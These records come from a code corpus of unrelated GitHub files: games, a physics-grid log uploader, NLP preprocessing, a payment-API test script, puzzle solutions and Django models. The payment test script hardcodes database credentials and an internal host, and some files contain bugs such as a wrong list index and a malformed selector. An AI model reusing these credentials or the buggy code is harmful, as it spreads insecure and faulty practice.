1\r\n if i == 1:\r\n print('Введите координату {}-палубного корабля'.format(i))\r\n else:\r\n print('Введите координату {}-палубного корабля,'.format(i),\r\n 'введите направление: 1 - горизонтально, 2 - вертикально')\r\n try:\r\n new_str = input().split()\r\n s = int(new_str[0])\r\n c = int(new_str[1])\r\n if len(new_str) > 2:\r\n orient = int(new_str[3])\r\n if orient not in [1, 2]:\r\n raise ValueError\r\n check = self.check_ship(i, s, c, orient)\r\n except ValueError:\r\n print('Введите корректное значение!')\r\n time.sleep(0.5)\r\n except IndexError:\r\n print('Введите корректное значение!')\r\n time.sleep(0.5)\r\n self.place_ship(i, s, c, orient)\r\n self.print_field()\r\n\r\n def check_win(self): # проверка выигрыша\r\n dead = 0\r\n for i in range(self.m):\r\n for j in range(self.n):\r\n if self.ships[i][j] == 4:\r\n dead += 1\r\n return True if dead == 20 else False\r\n\r\n\r\nclass Game:\r\n def __init__(self):\r\n self.player1 = Player()\r\n self.player2 = Player()\r\n self.player1.name = input('Введите имя первого игрока: ')\r\n self.player1.print_field()\r\n self.player1.input_coord()\r\n self.player2.print_field()\r\n self.player2.name = input('Введите имя второго игрока: ')\r\n self.player2.input_coord()\r\n print(self.player1.storage)\r\n os.system('cls')\r\n self.shot()\r\n\r\n def shot(self): # Принимает координаты выстрела\r\n flag = True\r\n player = self.player1 if flag else self.player2\r\n while not player.check_win():\r\n try:\r\n player.print_field(False)\r\n print('Ход игрока', player.name)\r\n s, c = list(map(int, input().split()))\r\n while player.hits[s][c]:\r\n print('Вы уже сюда стреляли! Попробуйте снова!')\r\n s, c = list(map(int, input().split()))\r\n player.hits[s][c] = 1\r\n flag = self.check_shot(player, s, c, flag)\r\n player = self.player1 if flag else self.player2\r\n except ValueError:\r\n print('Введите корректное значение!')\r\n time.sleep(0.5)\r\n print('Вы выиграли!')\r\n\r\n def check_shot(self, player, s, c, flag): # Проверяет, чему соответствует выстрел: мимо, убит, ранен\r\n if player.ships[s][c] == 0:\r\n player.ships[s][c] = 2\r\n player.print_field(False)\r\n print('мимо')\r\n time.sleep(0.8)\r\n return not flag\r\n elif player.ships[s][c] == 1:\r\n player.ships[s][c] = 3\r\n if self.check_dead(player, s, c):\r\n print('Убит')\r\n else:\r\n player.print_field(False)\r\n print('ранен')\r\n time.sleep(0.5)\r\n return flag\r\n\r\n @staticmethod\r\n def check_dead(player, s, c): # Проверяет, убит ли корабль\r\n for i in range(10):\r\n if [s, c] in player.storage[i]:\r\n for j in player.storage[i]:\r\n k, m = j\r\n if player.ships[k][m] != 3:\r\n return False\r\n for j in player.storage[i]:\r\n k, m = j\r\n player.ships[k][m] = 4\r\n Game.mimo(player, i)\r\n return True\r\n\r\n @staticmethod\r\n def mimo(player, m): # Расставляет мимо вокруг потонувшего корабля\r\n s, c = player.storage[m][0]\r\n deck = len(player.storage[m])\r\n if deck > 1 and player.storage[m][0][1] == player.storage[m][1][1]:\r\n orient = 2\r\n else:\r\n orient = 1\r\n if orient == 1:\r\n for i in range(s-1, s+2):\r\n for j in range(c-1, c + deck + 1):\r\n if 0 <= i <= 9 and 0 <= j <= 9 and not player.ships[i][j]:\r\n player.ships[i][j] = 2\r\n player.hits[i][j] = 1\r\n if orient == 2:\r\n for i in range(c-1, c+2):\r\n for j in range(s-1, s + deck + 1):\r\n if 0 <= i <= 9 and 0 <= j <= 9 and not player.ships[j][i]:\r\n player.ships[j][i] = 2\r\n player.hits[j][i] = 1\r\n\r\n\r\nos.system('cls')\r\ngame = Game()\r\n\r\n\r\n","repo_name":"GuldarKh/Python_HomeWorks","sub_path":"Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":7945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70111065928","text":"\"\"\" :mod: LogUpload\n ====================\n\n .. module: LogUpload\n :synopsis: logUpload operation handler\n\n LogUpload operation handler\n\"\"\"\n\n# # imports\nimport os\nfrom DIRAC import S_OK, S_ERROR\nfrom DIRAC.FrameworkSystem.Client.MonitoringClient import gMonitor\nfrom DIRAC.DataManagementSystem.Agent.RequestOperations.DMSRequestOperationsBase import DMSRequestOperationsBase\n\nclass LogUpload( DMSRequestOperationsBase ):\n \"\"\"\n .. class:: LogUpload\n\n LogUpload operation handler\n \"\"\"\n\n def __init__( self, operation = None, csPath = None ):\n \"\"\"c'tor\n\n :param self: self reference\n :param Operation operation: Operation instance\n :param str csPath: CS path for this handler\n \"\"\"\n # # base class ctor\n super( LogUpload, self ).__init__( operation = operation, csPath = csPath )\n # # gMonitor stuff\n gMonitor.registerActivity( \"LogUploadAtt\", \"Log upload attempted\",\n \"RequestExecutingAgent\", \"Files/min\", gMonitor.OP_SUM )\n gMonitor.registerActivity( \"LogUploadOK\", \"Replications successful\",\n \"RequestExecutingAgent\", \"Files/min\", gMonitor.OP_SUM )\n gMonitor.registerActivity( \"LogUploadFail\", \"Replications failed\",\n \"RequestExecutingAgent\", \"Files/min\", gMonitor.OP_SUM )\n self.workDirectory = os.environ.get( 'LOGUPLOAD_CACHE', os.environ.get( 'AGENT_WORKDIRECTORY', '/tmp/LogUpload' ) )\n\n def __call__( self ):\n \"\"\" LogUpload operation processing \"\"\"\n # # list of targetSEs\n\n if len( self.operation.targetSEList ) != 1:\n self.log.error( \"wrong value for TargetSE list = %s, should contain only one target!\" % self.operation.targetSEList )\n self.operation.Error = \"Wrong parameters: TargetSE should contain only one targetSE\"\n for opFile in self.operation:\n\n opFile.Status = \"Failed\"\n opFile.Error = \"Wrong parameters: TargetSE should contain only one targetSE\"\n\n gMonitor.addMark( \"LogUploadAtt\", 1 )\n gMonitor.addMark( \"LogUploadFail\", 1 )\n\n return S_ERROR( \"TargetSE should contain only one target, got %s\" % self.operation.targetSEList )\n\n # # check targetSEs for write\n bannedTargets = self.checkSEsRSS()\n if not bannedTargets['OK']:\n gMonitor.addMark( \"LogUploadAtt\", 1 )\n gMonitor.addMark( \"LogUploadFail\", 1 )\n return bannedTargets\n\n # # get waiting files\n waitingFiles = self.getWaitingFilesList()\n\n # # loop over files\n for opFile in waitingFiles:\n # # get LFN\n lfn = opFile.LFN\n self.log.info( \"processing file %s\" % lfn )\n gMonitor.addMark( \"LogUploadAtt\", 1 )\n\n destination = '/'.join( lfn.split( '/' )[0:-1] ) + '/' + ( os.path.basename( lfn ) ).split( '_' )[1].split( '.' )[0]\n logUpload = self.dm.replicate( lfn, self.operation.targetSEList[0], destPath = destination, localCache = self.workDirectory )\n if not logUpload[\"OK\"]:\n gMonitor.addMark( \"LogUploadFail\", 1 )\n# self.dataLoggingClient().addFileRecord( lfn, \"LogUploadFail\", targetSE, \"\", \"LogUpload\" )\n self.log.error( \"completely failed to upload log file: %s\" % logUpload[\"Message\"] )\n opFile.Error = str( logUpload[\"Message\"] )\n opFile.Attempt += 1\n self.operation.Error = opFile.Error\n if 'No such file or directory' in opFile.Error:\n opFile.Status = 'Failed'\n continue\n\n if lfn in logUpload['Value']:\n gMonitor.addMark( \"LogUploadOK\", 1 )\n# self.dataLoggingClient().addFileRecord( lfn, \"LogUpload\", targetSE, \"\", \"LogUpload\" )\n opFile.Status = 'Done'\n self.log.info( \"Uploaded %s to %s\" % ( lfn, self.operation.targetSEList[0] ) )\n\n return S_OK()\n","repo_name":"antolu/LHCbDIRAC","sub_path":"LHCbDIRAC/DataManagementSystem/Agent/RequestOperations/LogUpload.py","file_name":"LogUpload.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4316484390","text":"# Find the sum of the Digits of a Number.\n# Given an input the objective to find the Sum of Digits of a Number.\n# To do so we’ll first extract the last element of the number and then keep shortening the number itself.\n\n# Example\n# Input : number = 123\n# Output : 6\n\ndef sum_of_digits(num):\n s=0\n while(num!=0):\n s+=num%10\n num=num//10\n return s\n\nnum=int(input())\nprint(sum_of_digits(num))\n","repo_name":"ananya123-gif/Python_code-","sub_path":"PrepInsta_100_Code/Getting Started/10) Find the sum of the Digits of a Number.py","file_name":"10) Find the sum of the Digits of a Number.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2850972390","text":"import numpy as np\nimport pandas as pd\nfrom nltk import ISRIStemmer\nfrom pyarabic import araby\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nfrom stop_words import ArabicStopWords\nimport re\n\ndef tokenize(sample):\n tokens = araby.tokenize(sample)\n return tokens\n\n# Taking a List\ndef remove_Stop_Words(tokens):\n stop_words = ArabicStopWords()\n filtered = [token for token in tokens if token not in stop_words.get_stop_words()]\n return filtered\n\n\ndef print_Stop_Words(tokens):\n stop_words = ArabicStopWords()\n filtered = [token for token in tokens if token in stop_words.get_stop_words()]\n return filtered\n\n# Taking a List\ndef stemming(filtered_tokens):\n stemmer = ISRIStemmer()\n stemmed_tokens = [stemmer.stem(token) for token in filtered_tokens]\n return stemmed_tokens\n\n# Taking a word\ndef normalize(token):\n token = re.sub(\"[إأآا]\", \"ا\", token)\n token = re.sub(\"ى\", \"ي\", token)\n token = re.sub(\"ة\", \"ه\", token)\n token = re.sub(\"[\\W\\d]\", \"\", token)\n token = araby.strip_diacritics(token)\n token = araby.strip_tatweel(token)\n return token\n\nimport pandas as pd\n\n# Reading Dataset\nfile_path = 'DataSet.txt'\ncols = ['Class', 'Text']\nsample = pd.DataFrame(columns=cols)\n\nwith open(file_path, 'r', encoding='utf-8') as f:\n for line in f:\n try:\n line_parts = line.strip().split('\\t')\n class_label = line_parts[0]\n text = line_parts[1]\n new_row = pd.DataFrame({'Class': class_label, 'Text': text}, index=[0])\n sample = pd.concat([sample, new_row], ignore_index=True)\n except:\n pass\n\n\n# Preprocessing / Cleaning Dataset\n\n# Tokenization\nfor row in range(len(sample)):\n sample['Text'][row] = tokenize(sample['Text'][row])\n\n# Normalization\nfor row in range(len(sample)):\n sample['Text'][row] = [normalize(token) for token in sample['Text'][row]]\n\n# Removing Stop Words\nfor row in range(len(sample)):\n sample['Text'][row] = remove_Stop_Words(sample['Text'][row])\n\n# Stemming\nfor row in range(len(sample)):\n print(\"The ain't believe in us 2\")\n sample['Text'][row] = stemming(sample['Text'][row])\n\n# Removing null values\nfor row in range(len(sample)):\n sample['Text'][row] = [text for text in sample['Text'][row] if text != '']\n if not sample['Text'][row]: # check if the list is empty\n sample.drop(row, inplace=True)\n\n\nsample.to_csv('DataSet.csv', index=False)\n\n\n","repo_name":"SssiiiSssiii/Graduation-Project","sub_path":"Modules/Preprocessing.py","file_name":"Preprocessing.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28759572797","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\n#在test_case02基础上修改,修改返回错误信息\n\n\"\"\"\n需求:自动读取、执行excel里面的接口测试用例,测试完成后,返回错误结果并发送邮件通知。\n一步一步捋清需求:\n1、设计excel表格\n2、读取excel表格\n3、拼接url,发送请求\n4、汇总错误结果、发送邮件\n\"\"\"\nimport pytest\nimport xlrd\nimport os\nimport requests\nimport json\nimport yaml\nimport smtplib\nimport time\nimport datetime\nimport sys\nimport cx_Oracle\nimport webbrowser\nimport pytestreport\nimport logging\n\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email.header import Header\nfrom threading import Timer\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\nfrom bs4 import BeautifulSoup\nfrom common import Encrypt\nfrom common import Email\nfrom common import Log\n\ndef cases_in_excel(test_case_file):\n #workbook = xlrd.open_workbook(r'G:\\8.python\\ApiTest\\data\\test_data02.xlsx') # 直接读取execl文件\n change_dir = os.chdir(\"G:/8.python/pytest_testApi/Params\") #切换工作目录\n test_case_file = os.path.join(os.getcwd(), test_case_file) #获取修改后的工作目录\n print(test_case_file)\n if not os.path.exists(test_case_file):\n\n print(\"测试用例excel文件不存在或路径有误!\")\n # 找不到指定测试文件,就退出程序 os.system(\"exit\")是用来退出cmd的\n sys.exit()\n\n else:\n # 读取excel文件\n test_case = xlrd.open_workbook(test_case_file)\n # 获取第一个sheet,下标从0开始\n table = test_case.sheet_by_index(1)\n # 记录错误用例\n error_cases = []\n # 一张表格读取下来,其实就像个二维数组,无非是读取第一行的第几列的值,由于下标是从0开始,第一行是标题,所以从第二行开始读取数据\n for i in range(1, table.nrows):\n num = str(int(table.cell(i, 0).value)).replace(\"\\n\", \"\").replace(\"\\r\", \"\") #获取第2行第1列的内容\n api_name = table.cell(i, 1).value.replace(\"\\n\", \"\").replace(\"\\r\", \"\")\n api_host = table.cell(i, 2).value.replace(\"\\n\", \"\").replace(\"\\r\", \"\")\n request_url = table.cell(i, 3).value.replace(\"\\n\", \"\").replace(\"\\r\", \"\")\n method = table.cell(i, 4).value.replace(\"\\n\", \"\").replace(\"\\r\", \"\")\n request_data_type = table.cell(i, 5).value.replace(\"\\n\", \"\").replace(\"\\r\", \"\")\n request_data = table.cell(i, 6).value.replace(\"\\n\", \"\").replace(\"\\r\", \"\")\n check_point = table.cell(i, 7).value.replace(\"\\n\", \"\").replace(\"\\r\", \"\")\n message = table.cell(i, 8).value.replace(\"\\n\", \"\").replace(\"\\r\", \"\")\n\n #list_data = [num, api_name, api_host, request_url, method, request_data_type, request_data, check_point, message] # 将execl用例各字段转换为列表\n #print(list_data)\n #return list_data # 返回列表,给其他函数调用\n try:\n # 调用接口请求方法,后面会讲到\n req_List = request_interface(num, api_name, api_host, request_url, method,\n request_data_type, request_data, check_point, message)\n #print(req_List)\n\n for req_msg in req_List:\n transactionNno = req_msg[0]\n businessCode = req_msg[1]\n state = req_msg[2]\n\n if businessCode != 'AliNative':\n # append只接收一个参数,所以要将四个参数括在一起,当一个参数来传递\n # 请求失败,则向error_cases中增加一条记录\n error_cases.append((transactionNno, businessCode, state, \"发起交易异常\"))\n #print(error_cases)\n except Exception as e:\n print(e)\n print(\"订单{}交易失败,请检查失败原因!\".format(transactionNno))\n # 访问异常,也向error_cases中增加一条记录\n error_cases.append((transactionNno, businessCode, state, \"发起交易异常\"))\n #print(error_cases)\n return error_cases\n\n\ndef request_interface(num, api_name, api_host, request_url, method,\n request_data_type, request_data, check_point, message):\n # 构造请求headers\n headers = { 'Content-Type': 'application/json; charset=UTF-8',\n 'x-efps-sign' : Encrypt.req_encrypt(request_data),\n 'x-efps-sign-no' : '20190906test10'\n }\n # 判断请求方式,如果是GET,则调用get请求,POST调post请求,都不是,则抛出异常\n if method == \"GET\":\n r = requests.get(url=api_host+request_url, params=json.loads(request_data), headers=headers)\n result_json = r.json() #引入json模板,将响应结果转变为字典格式\n return_Code = result_json['returnCode'] #获取响应返回的returnCode值\n if check_point == return_Code: # 断言,判断预期值是否与响应参数returnCode一致\n print(\"第{}条用例'{}'执行成功,结果返回值为\\n{}. \". format(num, api_name, r.text))\n return return_Code\n else:\n print(\"第{}条用例'{}'执行失败!!!结果返回值为\\n{}.\".format(num, api_name, r.text))\n return return_Code\n\n elif method == \"POST\":\n try:\n payload1 = json.dumps(request_data) # 接受python的基本数据类型,然后将其序列化为string\n payload2 = json.loads(payload1) # 接受一个合法字符串,然后将其反序列化为python的基本数据类型\n r = requests.post(url=api_host+request_url, data=payload2, headers=headers)\n result_r_json = r.json() # 引入json模板,将响应结果转变为字典格式\n print(result_r_json)\n outTradeNo = result_r_json['outTradeNo']\n return_Code = result_r_json['returnCode']\n casherUrl = result_r_json['casherUrl']\n print(casherUrl)\n if check_point == return_Code: # 断言,判断预期值是否与响应参数returnCode一致\n # logger = Log.loggerClass('debug')\n # logger.debug(\"第{}条用例'{}'执行成功,结果返回值为\\n{}.\".format(num, api_name, r.text),'debug')\n print(\"第{}条用例'{}'执行成功,结果返回值为\\n{}.\".format(num, api_name, r.text))\n open_Website(casherUrl) # 调用函数打开收银台并选择支付宝\n order_list = check_payMethod(outTradeNo) # 调用函数检查是否选择正确的支付方式\n for order_msg in order_list:\n #transaction_no = order_msg[0]\n business_code = order_msg[1]\n #state = order_msg[2]\n #print(business_code)\n if business_code == 'AliNative':\n print(\"支付方式选择正确!\")\n else:\n print(\"支付方式选择错误!\")\n else:\n print(\"第{}条用例'{}'执行失败!!!结果返回值为\\n{}.\".format(num, api_name, r.text))\n return order_list\n print(order_list)\n except Exception as e:\n print(e)\n else:\n print(\"第{}条用例'{}'请求方式有误!!!请确认字段【Method】值是否正确,正确值为大写的GET或POST。\".format(num, api_name))\n return 400, \"请求方式有误\"\n\n\n# 后台打开收银台并选择支付宝支付\ndef open_Website(url):\n # 创建chrome浏览器驱动,无头模式(后台打开收银台)\n chrome_options = Options()\n chrome_options.add_argument('--headless')\n driver = webdriver.Chrome(options = chrome_options)\n\n # 加载界面\n driver.get(url)\n time.sleep(2)\n\n #逐渐滚动浏览器窗口,令ajax逐渐加载\n # for i in range(0,10):\n # driver.execute_script('window.scrollTo(0, document.body.scrollHeight)')\n # i += 1\n # time.sleep(4)\n\n # 拿到页面源码\n html = driver.page_source\n #print(html)\n #driver.find_element_by_css_selector('body > div.main > div.main-body.j-main > div.main-content.j-platform-content > div > ul > li:nth-child(2) > img').click() #支付宝\n driver.find_element_by_css_selector('body > div.main > div.main - body.j - main > div.main - content.j - platform - content > div > ul > li: nth - child(2) > img').click() #支付宝\n # driver.find_element_by_css_selector('body > div.main > div.main-body.j-main > div.main-content.j-platform-content > div > ul > li:nth-child(1) > img').click() #微信\n\n time.sleep(3)\n driver.quit()\n\n\n# 连接数据库,查询支付方式是否选择成功\ndef check_payMethod(out_trade_no):\n #建立连接\n order_list = []\n conn = cx_Oracle.connect('efps01', 'efps01', '172.20.19.201:1521/testdb')\n cursor = conn.cursor() #创建游标\n res = cursor.execute('select transaction_no,business_code,state from TXS_PAY_TRADE_ORDER where out_trade_no = \\'{}\\''.format(out_trade_no)) #此处也可以使用%r,因为%r会给字符串加了单引号,才能作为sql的查询条件\n data = res.fetchall() #获取数据\n for transaction_no, business_code, state in data:\n if len(transaction_no) != 0:\n print(\"已选择支付方式\")\n else:\n print(\"未选择支付方式\")\n order_list.append((transaction_no, business_code, state))\n return order_list\n #print(order_list)\n cursor.close() #关闭游标\n conn.close() #关闭数据库连接\n\n\ndef test_getCase():\n # 执行所有测试用例,获取错误的用例\n error_cases = cases_in_excel(\"test_cashierPay_data.xlsx\")\n #error_cases = get_error_cases()\n # 如果有错误接口,则开始构造html报告\n if len(error_cases) > 0:\n # html = '接口自动化扫描,共有 ' + str(len(error_cases)) + ' 个异常接口,列表如下:' + '

    '\n html = '主扫交易自动化测试,共有 ' + str(len(error_cases)) + ' 个异常交易,列表如下:' + '

    接口状态接口地址接口返回值
    '\n for test in error_cases:\n # html = html + ''\n html = html + ''\n Email.send_email(html)\n print(html)\n with open (\"G:/8.python/pytest_testApi/report/report.html\", \"w\") as f:\n f.write(html)\n else:\n print(\"本次测试,所有用例全部通过\")\n #send_email(\"本次测试,所有用例全部通过\")\n\n#\n#\nif __name__ == '__main__':\n #pytest.main(['--html=../report/report.html','test_cashierPay01.py'])\n # pytest.main([\"-s\", \"test_epspApi.py\", \"--pytest_report\", 'G:/8.python/pytest_testApi/report/report_' +datetime.datetime.today().strftime('%Y-%m-%d')+ '.html'])\n pytest.main([\"-s\", \"test_epspApi.py\", \"--pytest_report\", 'G:/8.python/pytest_testApi/report/report_' + time.strftime(\"%Y%m%d%H%M%S\",time.localtime(time.time())) + '.html'])\n\n","repo_name":"amnpt/EpspTest","sub_path":"testCase/test_epspApi.py","file_name":"test_epspApi.py","file_ext":"py","file_size_in_byte":12129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32387678104","text":"import subprocess\nimport sys\n\ndef get_platform():\n platforms = {\n 'linux1' : 'Linux',\n 'linux2' : 'Linux',\n 'darwin' : 'OS X',\n 'win32' : 'Windows'\n }\n \n if sys.platform not in platforms:\n return sys.platform\n \n return platforms[sys.platform]\n\n \ndef checkKey(d, k):\n if k in d:\n return True\n else:\n return False\n\ndef run(command:str):\n data = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n # print(data.args)\n # print(data.returncode)\n \n if data.returncode == 0:\n # print(data.stdout.decode())\n return {\"status\": True, \"result\" : data.stdout.decode()}\n else:\n # print(data.stderr.decode())\n return {\"status\": False, \"result\" : data.stderr.decode()}\n\n return data\n","repo_name":"HenriqueLuizz/inspetor-lestrade","sub_path":"src/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39159521772","text":"from src.core.model import *\nfrom src.core.barcode import *\nfrom src.core.date import *\nfrom src.core.webscraping import *\nfrom database.tables import *\nfrom database.database import Database\n\ndef sub_menu_options():\n print('1. Capturar fotos de estudiante')\n print('2. Actualizar sistema')\n print('3. Regresar')\n return int(input('Seleccionar opción: '))\n\ndef sub_menu():\n while True:\n opt = sub_menu_options()\n\n if opt == 1:\n print('Por favor, muestre el cósigo de barras del carnet...')\n barcode_detector = BarcodeDetector()\n barcode_detector.detect_barcodes()\n student_id = barcode_detector.get_id()\n db = Database()\n\n if db.student_exists(student_id):\n print('Este proceso es solo para nuevos estudiantes...')\n else:\n web_scraper = WebScraper(student_id)\n web_scraper.initialize_driver()\n student = web_scraper.scrape_student_data()\n\n db.insert_student(student)\n web_scraper.close_driver()\n print(student.name, ' agregado a la base de datos!')\n\n print('Para tomar fotos de tu rostro, por favor mire la cámara...')\n capture_frame = CaptureFrame(student_id)\n capture_frame.capture_faces()\n capture_frame.release_resources()\n print('Capturas de imágenes guardadas!')\n\n elif opt == 2:\n face_trainer = FaceRecognitionTrainer()\n face_trainer.train_model()\n\n elif opt == 3:\n print('Regresando...')\n break\n\n else:\n print('Esta opción no existe, inténtalo de nuevo.')\n\ndef menu_options():\n print('::::::: checkID :::::::')\n print('1. Comenzar')\n print('2. Opciones de administrador')\n print('3. Crear base de datos')\n print('4. Salir')\n return int(input('Seleccione una opción: '))\n\ndef menu():\n while True:\n option = menu_options()\n if option == 1:\n\n barcode_detector = BarcodeDetector()\n barcode_detector.detect_barcodes()\n id = int(barcode_detector.get_id())\n db = Database()\n if db.student_exists(id):\n print('Código validado')\n face_recognition = FaceRecognition(id)\n face_recognition.load_model()\n face_recognition.recognize_faces()\n if face_recognition.validated:\n date = CurrentDate()\n registration = Registration(id, date.get_current_date(), date.get_current_time())\n db.insert_registration(registration)\n print('Acceso otorgado!')\n else:\n print('El rostro no coincide')\n else:\n print('No eres de esta universidad')\n\n elif option == 2:\n sub_menu()\n\n elif option == 3:\n db = Database()\n db.create_tables()\n student1 = Student(21200026, 'rodrigo davila vasquez', 'ingeniería de software')\n student2 = Student(21200195, 'Kevin tupac aguero', 'ingeniería de software')\n db.insert_student(student1)\n db.insert_student(student2)\n\n elif option == 4:\n print('Saliendo del sistema...')\n break\n\n else:\n print('Esta opción no existe, intténtalo de nuevo')\n\nif __name__ == '__main__':\n menu()\n","repo_name":"diegoam11/check-id","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38825571812","text":"from __future__ import print_function\nimport pickle\nfrom game import Board, Game\nfrom mcts_pure import MCTSPlayer as MCTS_Pure\nfrom mcts_alphaZero import MCTSPlayer\nfrom police_value_net_numpy import PolicyValueNetNumpy\nfrom policy_value_net_pytorch import PolicyValueNet\n\nclass Human(object):\n def __init__(self):\n self.player = None\n\n def setPlayerInd(self, p):\n self.player = p\n\ndef run():\n n, width, height = 5, 8, 8\n model_file = 'best_policy_8_8_5.model'\n try:\n board = Board(width = width, height = height, n_in_row = n)\n game = Game(board)\n policy_param = pickle.load(open(model_file, 'rb'), encoding = 'bytes')\n bestPolicy = PolicyValueNetNumpy(width, height, policy_param)\n mctsPlayer = MCTSPlayer(bestPolicy.policyValueFn, cPuct = 5, nPlayout = 400)\n human = Human()\n game.startPlay(human, mctsPlayer, startPlayer = 1, isShown = 1)\n except KeyboardInterrupt:\n print('\\n\\rquit')\n\nif __name__ == '__main__':\n run()","repo_name":"Tokiwa-17/fiveInARow","sub_path":"human_play.py","file_name":"human_play.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70061105927","text":"from collections import defaultdict\n\nfrom utils.exceptions import SolutionNotFoundError\n\n\ndef get_digit_tuple(n: int) -> tuple[int, ...]:\n \"\"\"Get a 10-tuple of the digits of n.\"\"\"\n y = n\n dlist = [0] * 10\n while y != 0:\n d = y % 10\n dlist[d] += 1\n y //= 10\n return tuple(dlist)\n\n\ndef get_smallest_cube_with_five_perms() -> int:\n \"\"\"Get the smallest cube with 5 permutations that are also cube.\"\"\"\n tuples = defaultdict(set)\n max_n = 10000\n for n in range(max_n):\n cube = n**3\n tup = get_digit_tuple(cube)\n tuples[tup].add(cube)\n if len(tuples[tup]) == 5:\n return min(tuples[tup])\n raise SolutionNotFoundError(f\"No solution for n<{max_n}.\")\n","repo_name":"JohN100x1/Project-Euler","sub_path":"src/solutions/p062.py","file_name":"p062.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7292729889","text":"from rest_framework import serializers\n\nfrom .models import Product\n\nclass ProductSerializer(serializers.HyperlinkedModelSerializer):\n image = serializers.ImageField(\n max_length = None, allow_empty_file = False, allow_null = True, required = False) #requirements\n class Meta:\n model = Product\n fields = ('id', 'name', 'activity', 'country','mountains','description', 'price', 'image', 'price_table', 'category','description_long', 'product_url', 'location', 'slopes_easy', 'slopes_medium', 'slopes_hard', 'slopes_total', 'snow_mountain','snow_valley', 'rating_resort', 'rating_family' ,'rating_scenery', 'resort_map', 'peak_altitude')\n\n","repo_name":"rhribar/airjoy.io","sub_path":"api/product/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26149793970","text":"class Solution:\n def smallestBeautifulString(self, s: str, k: int) -> str:\n n = len(s)\n arr = [ord(ch) for ch in s]\n\n # since s has already been beautiful\n # for i position, we only need to check i-1 and i-2 position\n # i-1: AA palindrome\n # i-2: AXA palindrome\n def checkBautiful(arr, i):\n if i-1 >= 0 and arr[i-1] == arr[i]: # check AA palindrome\n return False\n if i-2 >= 0 and arr[i-2] == arr[i]: # check AXA palindrome\n return False\n return True\n \n for i in range(n-1, -1, -1):\n for ch in range(arr[i]+1, ord(\"a\")+k):\n arr[i] = ch\n if checkBautiful(arr, i):\n k = i+1\n \n while k < n:\n mod = 0\n arr[k] = ord(\"a\")+mod\n while not checkBautiful(arr, k):\n mod = (mod+1)%3\n arr[k] = ord(\"a\")+mod\n\n k += 1\n\n return \"\".join(chr(rune) for rune in arr)\n return \"\"\n","repo_name":"Vergil0327/leetcode-history","sub_path":"String/2663. Lexicographically Smallest Beautiful String/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9259114506","text":"from auditlog.models import AuditlogHistoryField\nfrom auditlog.registry import auditlog\nfrom django.db import models\nfrom django.db.models.signals import pre_save, post_save\nfrom django.dispatch import receiver\n\nfrom sme_ptrf_apps.core.models_abstracts import ModeloBase\nfrom .fornecedor import Fornecedor\nfrom .validators import cpf_cnpj_validation\nfrom ..status_cadastro_completo import STATUS_CHOICES, STATUS_COMPLETO, STATUS_INCOMPLETO\nfrom ...core.models import Associacao\n\n\nclass Despesa(ModeloBase):\n history = AuditlogHistoryField()\n\n associacao = models.ForeignKey(Associacao, on_delete=models.PROTECT, related_name='despesas', blank=True,\n null=True)\n\n numero_documento = models.CharField('Nº do documento', max_length=100, default='', blank=True)\n\n tipo_documento = models.ForeignKey('TipoDocumento', on_delete=models.PROTECT, blank=True, null=True)\n\n data_documento = models.DateField('Data do documento', blank=True, null=True)\n\n cpf_cnpj_fornecedor = models.CharField(\n \"CPF / CNPJ\", max_length=20, validators=[cpf_cnpj_validation]\n , blank=True, null=True, default=\"\"\n )\n\n nome_fornecedor = models.CharField(\"Nome do fornecedor\", max_length=100, default='', blank=True)\n\n tipo_transacao = models.ForeignKey('TipoTransacao', on_delete=models.PROTECT, blank=True, null=True)\n\n documento_transacao = models.CharField('Nº doc transação', max_length=100, default='', blank=True)\n\n data_transacao = models.DateField('Data da transacao', blank=True, null=True)\n\n valor_total = models.DecimalField('Valor Total', max_digits=8, decimal_places=2, default=0)\n\n valor_recursos_proprios = models.DecimalField('Valor pago com recursos próprios', max_digits=8, decimal_places=2,\n default=0)\n\n valor_original = models.DecimalField('Valor original', max_digits=8, decimal_places=2, default=0)\n\n status = models.CharField(\n 'status',\n max_length=15,\n choices=STATUS_CHOICES,\n default=STATUS_INCOMPLETO\n )\n\n @property\n def valor_ptrf(self):\n return self.valor_total - self.valor_recursos_proprios\n\n valor_ptrf.fget.short_description = 'Valor coberto pelo PTRF'\n\n def __str__(self):\n return f\"{self.numero_documento} - {self.data_documento} - {self.valor_total:.2f}\"\n\n def cadastro_completo(self):\n completo = self.tipo_documento and \\\n self.data_documento and \\\n self.cpf_cnpj_fornecedor and \\\n self.nome_fornecedor and \\\n self.tipo_transacao and \\\n self.data_transacao and \\\n 